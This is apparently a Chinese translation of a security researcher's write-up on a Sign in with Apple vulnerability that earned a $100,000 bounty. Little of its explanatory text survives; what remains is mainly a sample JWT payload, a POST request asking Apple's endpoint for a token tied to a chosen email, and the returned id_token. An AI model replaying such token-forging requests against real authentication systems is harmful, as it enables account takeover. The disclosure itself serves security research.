其他
呐,一个苹果洞赚10万美元的详细经验都在这里了~
安全研究员 Bhavuk Jain 在 Sign in with Apple 功能中发现了一个严重漏洞,并因此获得10万美元的奖金。如下是奇安信代码卫士团队对博客文章内容的翻译:
{ "iss": "https://appleid.apple.com", "aud": "com.XXXX.weblogin", "exp": 158XXXXXXX, "iat": 158XXXXXXX, "sub": "XXXX.XXXXX.XXXX", "c_hash": "FJXwx9EHQqXXXXXXXX", "email": "contact@bhavukjain.com", // or "XXXXX@privaterelay.appleid.com" "email_verified": "true", "auth_time": 158XXXXXXX, "nonce_supported": true}POST /XXXX/XXXX HTTP/1.1Host: appleid.apple.com
{"email":"contact@bhavukjain.com"}{ "authorization" : { "id_token" : "eyJraWQiOiJlWGF1bm1MIiwiYWxnIjoiUlMyNTYifQ.XXXXX.XXXXX", "grant_code" : "XXX.0.nzr.XXXX", "scope" : [ "name", "email" ] }, "authorizedData" : { "userId" : "XXX.XXXXX.XXXX" }, "consentRequired" : false}https://bhavukjain.com/blog/2020/05/30/zeroday-signin-with-apple/
题图:Pixabay License
本文由奇安信代码卫士编译,不代表奇安信观点。转载请注明“转自奇安信代码卫士 www.codesafe.cn”。
奇安信代码卫士 (codesafe)
国内首个专注于软件开发安全的
产品线。